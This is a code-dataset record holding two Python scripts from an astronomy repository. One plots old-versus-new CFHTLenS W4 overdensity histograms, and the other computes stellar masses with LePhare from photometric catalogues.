plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(453)\n\ns = \"50: %.3f,%.3f,%.3f\" % 
(bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{z}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 3\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=7\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(454)\nrangemax=4\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(454)\n\ns = \"50: %.3f,%.3f,%.3f\" % 
(bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 4\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=9\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(456)\nrangemax=7\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(456)\n\ns = \"50: %.3f,%.3f,%.3f\" % 
(bins_q_W4_50new[np.argmax(n_q_W4_50new)],np.average(q_W4_50new),np.median(q_W4_50new))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75old[np.argmax(n_q_W4_75old)],np.average(q_W4_75old),np.median(q_W4_75old))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 5\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)
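\n\n# the eleven remaining panels repeat exactly the same recipe (load the old/new .lst\n# columns, cut at q < 10, histogram, annotate), so they are generated in a loop below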
\n\n# each entry gives the .lst column to read, the panel slot on the 4x5 grid, the\n# histogram range and the axis label\npanels = [(11, 7, 6, r'$\\zeta_{M^2_{rms}}$'), (13, 8, 6, r'$\\zeta_{M^3}$'), (15, 9, 7, r'$\\zeta_{M^3_{rms}}$'), (17, 11, 4, r'$\\zeta_\\frac{z}{r}$'), (19, 12, 7, r'$\\zeta_\\frac{M}{r}$'), (21, 13, 6, r'$\\zeta_\\frac{M^2}{r}$'), (23, 14, 6, r'$\\zeta_\\frac{M^3}{r}$'), (25, 16, 8, r'${\\zeta_\\frac{M_{rms}^2}{r}}$'), (27, 17, 8, r'${\\zeta_\\frac{M_{rms}^3}{r}}$'), (29, 18, 7, r'$\\zeta_\\frac{zM}{r}$'), (31, 19, 10, r'$\\zeta_\\frac{zM^2}{r}$')]
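\n# note: the fifth column of the grid (slots 5, 10, 15, 20) is left empty; the legend\n# is drawn into that space at the end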
\nfor cols, pos, rangemax, label in panels:\n    q_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\n    q_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n    q_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\n    q_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n    q_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\n    q_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n    q_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\n    q_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\n    ax = plt.subplot(4, 5, pos)\n    # each histogram is drawn once: solid for the 50 catalogues, dotted for the 75 ones,\n    # black for old and red for new\n    n_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n    n_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n    n_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n    n_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
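\n    # the mode quoted in the annotations is the left edge of the highest histogram bin;\n    # the mean and median are computed from the full q < 10 sample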
\n    s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50new[np.argmax(n_q_W4_50new)],np.average(q_W4_50new),np.median(q_W4_50new))\n    ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n    s = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\n    ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n    s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\n    ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n    s = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75old[np.argmax(n_q_W4_75old)],np.average(q_W4_75old),np.median(q_W4_75old))\n    ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
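\n    # a smoothed curve can be overlaid on the histograms (sketch, kept disabled; assumes\n    # gaussian_kde is available in the namespace, e.g. from scipy.stats):\n    #x = linspace(0,3,500)\n    #plt.plot(x, gaussian_kde(q_W4_50old)(x), 'b', linewidth=0.5)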
\n    plt.xlabel(label, fontsize=15)\n    plt.ylabel(\"Normalized cnts\", fontsize=7)\n    plt.tick_params(axis='x', labelsize=6)\n    plt.tick_params(axis='y', labelsize=6)\n    plt.setp(plt.xticks()[1], rotation=90)\n\n    subplot = subplot + 1\n    print \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)
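\n\n# the visual old-vs-new comparison could also be quantified, e.g. with a two-sample\n# KS test per statistic (sketch, kept disabled):\n#from scipy.stats import ks_2samp\n#D, p = ks_2samp(q_W4_50old, q_W4_50new)\n#print \"KS: D=%.3f, p=%.3g\" % (D, p)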
\n\nplt.legend(bbox_to_anchor=(1.5, 4), loc='center left', borderaxespad=0., fontsize=10)\n\n#plt.subplots_adjust(top=0.6)\n\nplt.tight_layout()\n\nplt.savefig('%s_overdensities_%s_size%s_i%s_oldnew.png' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), dpi=1000)\n\n#plt.show()\n\nos.system(\"rm fieldshistW4_50_%s_%s_size%s_i%s_new.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW4_75_%s_%s_size%s_i%s_new.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\n\n\nif str(sys.argv[2]) == \"samp\":\n    print(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.5214543342590332, "alphanum_fraction": 0.5469812750816345, "avg_line_length": 54.644859313964844, "blob_id": "56fd94fbf31459f4e8fd006d0a2719c0f84f64ee", "content_id": "888cdd1e5cf0dda26dda80b8c7258f8884856e01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11909, "license_type": "no_license", "max_line_length": 320, "num_lines": 214, "path": "/python/catalogue_utilities/mstarCFHTLENS.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# run from the lephare_dev/test folder as: python /Users/perseus/Dropbox/Davis_work/code/mstarCFHTLENS.py /Users/perseus/Dropbox/Davis_work/code/fieldstry.lst number\n# where number should be different for different processes run at the same time
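\n#\n# batching strategy: objects are processed in groups of lepharenr; for each object one\n# LePhare input row is written per P(z) grid point with probability > 0.001 (context 47\n# for i-detected objects, 55 for y-detected ones), and the returned stellar-mass\n# percentiles and chi^2 values are mapped back to the corresponding redshift bin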
\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\n\nstart_timefield = time.time()\n\nwith open(str(sys.argv[1])) as fields: # fieldstry#.lst\n    listfields = fields.readlines()\nlepharenr=10 # number of objects sent to LePhare in each batch\nu_CFHTLS=np.zeros(lepharenr)\nuerr_CFHTLS=np.zeros(lepharenr)\ng_CFHTLS=np.zeros(lepharenr)\ngerr_CFHTLS=np.zeros(lepharenr)\nr_CFHTLS=np.zeros(lepharenr)\nrerr_CFHTLS=np.zeros(lepharenr)\ni_CFHTLS=np.zeros(lepharenr)\nierr_CFHTLS=np.zeros(lepharenr)\ny_CFHTLS=np.zeros(lepharenr)\nyerr_CFHTLS=np.zeros(lepharenr)\nz_CFHTLS=np.zeros(lepharenr)\nzerr_CFHTLS=np.zeros(lepharenr)\npofz=np.zeros((lepharenr,70))\nmass_best=np.zeros((lepharenr,70))\nmass_inf=np.zeros((lepharenr,70))\nmass_med=np.zeros((lepharenr,70))\nmass_sup=np.zeros((lepharenr,70))\nchigal=np.zeros((lepharenr,70))\nchistar=np.zeros((lepharenr,70))\nz=np.linspace(0.05,3.5,70) # redshift grid matching the 70 P(z) columns of the _pdz catalogues\nfor count in range(len(listfields)):\n    start_timesubfield = time.time()\n    i=0 # object index in original catalogue\n    itrue=0 # index of only the objects passing the selection criteria\n    name=[]\n    with open('%s.cat' % [x[0:len(listfields[0])-1] for x in listfields][count]) as orig:\n        os.system(\"rm %s_mstar.cat\" % [x[0:len(listfields[0])-1] for x in listfields][count]) # since the code only appends, an incomplete previous output must be removed first\n        with open('%s_pdz.cat' % [x[0:len(listfields[0])-1] for x in listfields][count]) as pdz:\n            linepdz=pdz.readlines()\n            for lineorig in orig:\n                if lineorig.split()[0]==\"#id\":\n                    check=\"false\"\n                else:\n                    #print lineorig.split()[0], linepdz[i].split()[0], \"\\n\"\n                    if lineorig.split()[0] != linepdz[i].split()[0]:\n                        print \"Catalogue mismatch!\"\n                        break\n                    check=\"false\"\n                    if itrue==lepharenr:\n                        if i_CFHTLS[0]>0: # caveat: a batch is labelled i- or y-band based on its first object, so a batch mixing i- and y-detected objects would pass the wrong magnitude prior to the .sh script; in practice this does not arise, since the CFHTLENS subfields do not appear to contain mixed i and y mag objects.
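\n                        # (CONTEXT 47 vs 55 written below presumably encodes the LePhare filter bitmask\n                        # over u,g,r,i,y,z = 1,2,4,8,16,32, i.e. dropping the unused y or i band, respectively)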
\n name_in=\"/Users/perseus/lephare_dev/test/izrgu_%s.cat\" % str(sys.argv[2])\n name_out=\"/Users/perseus/lephare_dev/test/izrgu_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\n else:\n name_in=\"/Users/perseus/lephare_dev/test/yzrgu_%s.cat\" % str(sys.argv[2])\n name_out=\"/Users/perseus/lephare_dev/test/yzrgu_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\n lephare_in = open(name_in,'w')\n lephare_in.write(\"# \\t ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t y \\t y_err \\t z \\t z_err \\t context \\t z-spec \\t string \\n\")\n list=[]\n for k in range(lepharenr): #create list of lists\n list.append([])\n for k in range(lepharenr):\n for j in range(70):\n if pofz[k][j]>0.001:\n list[k].append(j)\n if i_CFHTLS[0]>0:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s 47 %s\\n' % (len(list[k]),u_CFHTLS[k],uerr_CFHTLS[k],g_CFHTLS[k],gerr_CFHTLS[k],r_CFHTLS[k],rerr_CFHTLS[k],i_CFHTLS[k],ierr_CFHTLS[k],y_CFHTLS[k],yerr_CFHTLS[k],z_CFHTLS[k],zerr_CFHTLS[k],z[j]))\n else:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s 55 %s\\n' % (len(list[k]),u_CFHTLS[k],uerr_CFHTLS[k],g_CFHTLS[k],gerr_CFHTLS[k],r_CFHTLS[k],rerr_CFHTLS[k],i_CFHTLS[k],ierr_CFHTLS[k],y_CFHTLS[k],yerr_CFHTLS[k],z_CFHTLS[k],zerr_CFHTLS[k],z[j]))\n lephare_in.close()\n os.system(\"/Users/perseus/lephare_dev/test/runlephare_phys_para_CFHTLS.sh %s\" % name_in)\n l=0\n with open('%s' % name_out) as lephare_out:\n lineout=lephare_out.readlines()\n for k in range(lepharenr):\n for j in range(len(list[k])):\n mass_best[k][list[k][j]]=float(lineout[62+l].split()[29])\n mass_inf[k][list[k][j]]=float(lineout[62+l].split()[30])\n mass_med[k][list[k][j]]=float(lineout[62+l].split()[31])\n mass_sup[k][list[k][j]]=float(lineout[62+l].split()[32])\n chigal[k][list[k][j]]=float(lineout[62+l].split()[5])\n chistar[k][list[k][j]]=float(lineout[62+l].split()[6])\n l=l+1\n outfile=open('%s_mstar.cat' % [x[0:len(listfields[0])-1] for x in listfields][count],'a')\n output=\"\"\n for k in range(lepharenr):\n output=output+name[k]+\"\\t\"\n for j in range(70):\n output=output+str(mass_best[k][j])+\"\\t\"+str(mass_inf[k][j])+\"\\t\"+str(mass_med[k][j])+\"\\t\"+str(mass_sup[k][j])+\"\\t\"+str(chigal[k][j])+\"\\t\"+str(chistar[k][j])+\"\\t\"\n output=output+\"\\n\"\n outfile.write(output)\n outfile.close()\n name=[]\n itrue=0\n mass_best=np.zeros((lepharenr,70))\n mass_inf=np.zeros((lepharenr,70))\n mass_med=np.zeros((lepharenr,70))\n mass_sup=np.zeros((lepharenr,70))\n chigal=np.zeros((lepharenr,70))\n chistar=np.zeros((lepharenr,70))\n #print lineorig.split()[60], \"\\n\"\n if (int(lineorig.split()[60]) == 0) and ((float(lineorig.split()[79]) <= 24 and float(lineorig.split()[79]) > 0) or (float(lineorig.split()[84]) <= 24 and float(lineorig.split()[84]) > 0)): #star_flag and mag_i, mag_y\n print \"------ running object number: \\t\", i, \"------\"\n name.append(lineorig.split()[0])\n u_CFHTLS[itrue]=float(lineorig.split()[64])\n uerr_CFHTLS[itrue]=float(lineorig.split()[65])\n g_CFHTLS[itrue]=float(lineorig.split()[69])\n gerr_CFHTLS[itrue]=float(lineorig.split()[70])\n r_CFHTLS[itrue]=float(lineorig.split()[74])\n rerr_CFHTLS[itrue]=float(lineorig.split()[75])\n i_CFHTLS[itrue]=float(lineorig.split()[79])\n ierr_CFHTLS[itrue]=float(lineorig.split()[80])\n y_CFHTLS[itrue]=float(lineorig.split()[84])\n yerr_CFHTLS[itrue]=float(lineorig.split()[85])\n z_CFHTLS[itrue]=float(lineorig.split()[89])\n zerr_CFHTLS[itrue]=float(lineorig.split()[90])\n if u_CFHTLS[itrue]==99.0:\n u_CFHTLS[itrue]=-99.0\n if 
uerr_CFHTLS[itrue]==99.0:\n uerr_CFHTLS[itrue]=-99.0\n if g_CFHTLS[itrue]==99.0:\n g_CFHTLS[itrue]=-99.0\n if gerr_CFHTLS[itrue]==99.0:\n gerr_CFHTLS[itrue]=-99.0\n if r_CFHTLS[itrue]==99.0:\n r_CFHTLS[itrue]=-99.0\n if rerr_CFHTLS[itrue]==99.0:\n rerr_CFHTLS[itrue]=-99.0\n if i_CFHTLS[itrue]==99.0:\n i_CFHTLS[itrue]=-99.0\n if ierr_CFHTLS[itrue]==99.0:\n ierr_CFHTLS[itrue]=-99.0\n if y_CFHTLS[itrue]==99.0:\n y_CFHTLS[itrue]=-99.0\n if yerr_CFHTLS[itrue]==99.0:\n yerr_CFHTLS[itrue]=-99.0\n if z_CFHTLS[itrue]==99.0:\n z_CFHTLS[itrue]=-99.0\n if zerr_CFHTLS[itrue]==99.0:\n zerr_CFHTLS[itrue]=-99.0\n for j in range(69):\n #print linepdz[i].split()[j+2], \"\\n\"\n #print [x[0:len(linepdz[i].split()[j+2])-1] for x in linepdz[i].split()[j+2]], \"\\n\"\n string=str(linepdz[i].split()[j+2])\n pofz[itrue][j]=float(string[:-1]) #because the last character is \",\"\n string=str(linepdz[i].split()[71])\n pofz[itrue][69]=float(string)\n i=i+1\n itrue=itrue+1\n check=\"true\"\n if check==\"false\":\n i=i+1\n #the code below is necessary to deal with the objects at the end of the file, if there are less than lepharenr objects left\n if i_CFHTLS[0]>0: # this is a drawback of the current code, in case the lephare input contains mixed i,y all entries are considered as i\n name_in=\"/Users/perseus/lephare_dev/test/izrgu_%s.cat\" % str(sys.argv[2])\n name_out=\"/Users/perseus/lephare_dev/test/izrgu_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\n else:\n name_in=\"/Users/perseus/lephare_dev/test/yzrgu_%s.cat\" % str(sys.argv[2])\n name_out=\"/Users/perseus/lephare_dev/test/yzrgu_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\n lephare_in = open(name_in,'w')\n lephare_in.write(\"# \\t ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t y \\t y_err \\t z \\t z_err \\t context \\t z-spec \\t string \\n\")\n list=[]\n for k in range(itrue): #create list of lists\n list.append([])\n for k in range(itrue):\n for j in range(70):\n if pofz[k][j]>0.001:\n list[k].append(j)\n if i_CFHTLS[0]>0:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s 47 %s\\n' % (len(list[k]),u_CFHTLS[k],uerr_CFHTLS[k],g_CFHTLS[k],gerr_CFHTLS[k],r_CFHTLS[k],rerr_CFHTLS[k],i_CFHTLS[k],ierr_CFHTLS[k],y_CFHTLS[k],yerr_CFHTLS[k],z_CFHTLS[k],zerr_CFHTLS[k],z[j]))\n else:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s 55 %s\\n' % (len(list[k]),u_CFHTLS[k],uerr_CFHTLS[k],g_CFHTLS[k],gerr_CFHTLS[k],r_CFHTLS[k],rerr_CFHTLS[k],i_CFHTLS[k],ierr_CFHTLS[k],y_CFHTLS[k],yerr_CFHTLS[k],z_CFHTLS[k],zerr_CFHTLS[k],z[j]))\n lephare_in.close()\n os.system(\"/Users/perseus/lephare_dev/test/runlephare_phys_para.sh %s\" % name_in)\n l=0\n with open('%s' % name_out) as lephare_out:\n lineout=lephare_out.readlines()\n for k in range(itrue):\n for j in range(len(list[k])):\n mass_best[k][list[k][j]]=float(lineout[62+l].split()[29])\n mass_inf[k][list[k][j]]=float(lineout[62+l].split()[30])\n mass_med[k][list[k][j]]=float(lineout[62+l].split()[31])\n mass_sup[k][list[k][j]]=float(lineout[62+l].split()[32])\n chigal[k][list[k][j]]=float(lineout[62+l].split()[5])\n chistar[k][list[k][j]]=float(lineout[62+l].split()[6])\n l=l+1\n outfile=open('%s_mstar.cat' % [x[0:len(listfields[0])-1] for x in listfields][count],'a')\n output=\"\"\n for k in range(itrue):\n output=output+name[k]+\"\\t\"\n for j in range(70):\n output=output+str(mass_best[k][j])+\"\\t\"+str(mass_inf[k][j])+\"\\t\"+str(mass_med[k][j])+\"\\t\"+str(mass_sup[k][j])+\"\\t\"+str(chigal[k][j])+\"\\t\"+str(chistar[k][j])+\"\\t\"\n output=output+\"\\n\"\n 
